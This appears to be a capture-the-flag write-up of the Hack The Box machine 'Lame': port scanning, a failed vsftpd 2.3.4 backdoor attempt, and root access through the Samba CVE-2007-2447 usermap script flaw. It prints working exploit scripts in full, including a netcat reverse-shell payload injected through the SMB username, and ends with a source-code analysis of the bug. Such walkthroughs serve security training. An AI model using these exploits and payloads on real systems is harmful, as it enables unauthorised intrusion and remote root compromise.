Home HTB Lame Writeup
Post
Cancel

HTB Lame Writeup

Notes

Lame

NameExplore
OSLinux
RELEASE DATE14 Mar 2017
DIFFICULTYEasy

IP:10.10.10.3

Port Scan

I started with a nmap scan on this machine to enumerate open ports.

nmap -p- --min-rate 1000 10.10.10.3 -oN allPorts.nmap -Pn -v -p- – Scan all ports --min-rate 1000 – Speed up the scan -oN – Save the output to a file -Pn – Skip host discovery -v – Verbose (show more output as the scan is running)

1
2
3
4
5
6
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

With a list of open ports, I then did a deeper nmap scan to enumerate service versions and run safe scripts

nmap -p 21,22,139,445,3632 -oN scriptScan.nmap -sVC 10.10.10.3 -Pn -p – Scan port specified -oN – Save the output to a file -sVC – Determine service version & run default NSE scripts

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-09-14T17:28:46-04:00
|_clock-skew: mean: 2h00m14s, deviation: 2h49m47s, median: 10s

21/TCP FTP

Anonymous login is enabled but there is nothing.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌─[✗]─[zon@pwn]─[~/htb/lame]
└──╼ $ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:zon): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

nmap determined that this FTP server is running vsFTPd 2.3.4. It’s always worth searching for a CVE when a version is found. I used searchsploit and found a backdoor command execution vulnerability!

1
2
3
4
5
6
7
8
┌─[zon@pwn]─[~/htb/lame]
└──╼ $searchsploit vsFTPd 2.3.4
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                       | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                          | unix/remote/17491.rb
---------------------------------------------------------------------------------------------------------------- ---------------------------------

searchsploit has a -m switch that will “mirror” aka copies an exploit to the current working directory.

1
2
3
4
5
6
7
8
┌─[zon@pwn]─[~/htb/lame]                                                 
└──╼ $searchsploit -m unix/remote/49757.py
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757                                                                                              
     Path: /opt/exploitdb/exploits/unix/remote/49757.py                                                                                           
File Type: Python script, ASCII text executable                                                                                                   
                                                                                                                                                  
Copied to: /home/zon/htb/lame/49757.py

Before running an exploit I like to look at the exploit to make sure it is “safe” and there is no backdoor or unintended things happening. It looks pretty good to me. It will connect to the server using the username nergal:) and then spawn a shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌─[zon@pwn][~/htb/lame]                                                                                                                          
└──╼ $cat 49757.py                                                                                                                                
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution                                                                                        
# Date: 9-04-2021                                                                                                                                 
# Exploit Author: HerculesRD                                                                                                                      
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html                                                        
# Version: vsftpd 2.3.4                                                                                                                           
# Tested on: debian                                                      
# CVE : CVE-2011-2523                                                                                                                             
                                                                                                                                                  
#!/usr/bin/python3                                                                                                                                
                                                                                                                                                  
from telnetlib import Telnet                                                                                                                      
import argparse                                                          
from signal import signal, SIGINT                                                                                                                 
from sys import exit                                                                                                                              
                                                                                                                                                  
def handler(signal_received, frame):                                                                     
    # Handle any cleanup here                                                                  
    print('   [+]Exiting...')                                                                                                                     
    exit(0)                                                                                                                                       
                                                                         
signal(SIGINT, handler)                                                                                                                           
parser=argparse.ArgumentParser()                                         
parser.add_argument("host", help="input the address of the vulnerable host", type=str)                                                            
args = parser.parse_args()                                                                     
host = args.host                                                                               
portFTP = 21 #if necessary edit this line                                                                                                         
                                                                         
user="USER nergal:)"                           
password="PASS pass"                           
                                               
tn=Telnet(host, portFTP)                                                                       
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line                                           
tn.write(user.encode('ascii') + b"\n")                                                                   
tn.read_until(b"password.") #if necessary, edit this line                                                
tn.write(password.encode('ascii') + b"\n")                                                               

tn2=Telnet(host, 6200)                              
print('Success, shell opened')                      
print('Send `exit` to quit shell')                  
tn2.interact()

After running the exploit it did not work!

1
2
3
4
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 49757.py 10.10.10.3
id
ls

To double check, I tried the exploit manually and it still did not work

1
2
3
4
5
6
7
8
9
10
┌─[zon@pwn]─[~/htb/lame]
└──╼ $ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:zon): nergal:)
331 Please specify the password.
Password:
500 OOPS: priv_sock_get_result
Login failed.
421 Service not available, remote server has closed connection

22/TCP SSH

SSH usually has a low attack surface. I googled OpenSSH 4.7p1 to see if there were any public exploits but I could not find one, let’s move on

139/TCP & 445/TCP SMB

nmap determined that smbd 3.0.20-Debian is running on this server. I googled smbd 3.0.20-Debian and the first link was an exploit-db entry to an RCE exploit dubbed CVE: 2007-2447. This exploit is in metasploit but I like to stay away from metasploit and understand how the exploit work (below I will do an in-depth analysis of this exploit). I did another google search for CVE-2007-2447 and the first link was to this repo.

usermap_script.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
        username = "/=`nohup " + payload + "`"
        conn = SMBConnection(username, "", "", "")
        try:
            conn.connect(rhost, int(rport), timeout=1)
        except:
            print("[+] Payload was sent - check netcat !")

if __name__ == '__main__':
    print("[*] CVE-2007-2447 - Samba usermap script")
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)

To run this exploit I will set up a nc listener nc -lvnp 9001 and then run the exploit.

1
2
3
4
5
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 usermap_script.py 10.10.10.3 445 10.10.14.5 9001
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

Back on netcat I get a shell as root!

1
2
3
4
5
6
┌─[zon@pwn]─[~/htb/lame]
└──╼ $nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.3] 45130
whoami
root

CVE-2007-2447 - Samba usermap script

Samba 3.0.0 - 3.0.25rc3 are vulnerable to CVE-2007-2447 which allows a remote attacker to execute commands via the username parameter.

Two files that are important to this exploit smbrun.c and map_username.c

map_username.c

In the code below we can see that command is set to cmd and user. cmd will be set to a script defined in smb.conf, user will be set to whatever we supply. Putting it all together a normal request will look like /etc/samba/script/usermap.sh “Zonifer”. That string is then sent to smbrun

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
if ( *cmd ) {
        char **qlines;
        pstring command;
        int numlines, ret, fd;

---->   pstr_sprintf( command, "%s \"%s\"", cmd, user ); 

        DEBUG(10,("Running [%s]\n", command));
---->   ret = smbrun(command, &fd);
        DEBUGADD(10,("returned [%d]\n", ret));

        if ( ret != 0 ) {
                if (fd != -1)
                        close(fd);
                return False;
        }

smbrun.c

Below is the smbrun function that will execute /bin/sh sh -c /etc/samba/script/usermap.sh "Zonifer". Because there is no input sanitization we can inject into execl and execute any command we want! The payload will look like /=`nohup{payload}`.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
```c
#ifndef __INSURE__
        /* close all other file descriptors, leaving only 0, 1 and 2. 0 and
           2 point to /dev/null from the startup code */
        {
        int fd;
        for (fd=3;fd<256;fd++) close(fd);
        }
#endif

        execl("/bin/sh","sh","-c",cmd,NULL);  

        /* not reached */
        exit(82);
        return 1;
}

Doing a quick modification to the exploit code I can write a file to /tmp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/python3
import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport):
    payload = 'touch /tmp/zon.txt'
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        conn.connect(rhost, int(rport), timeout=1)
    except:
        print("[+] Payload was sent")

if __name__ == '__main__':
    print("[*] CVE-2007-2447 - Samba usermap script")
    print("[+] Connecting !")
    rhost = sys.argv[1]
    rport = sys.argv[2]
    exploit(rhost, rport)

Contents of /tmp before

1
2
3
4
5
ls
5573.jsvc_up
hago
vgauthsvclog.txt.0
vmware-root

Run exploit

1
2
3
4
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 mod.py 10.10.10.3 445 
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !

View /tmp

1
2
3
4
5
6
ls
5573.jsvc_up
hago
vgauthsvclog.txt.0
vmware-root
zon.txt
This post is licensed under CC BY 4.0 by the author.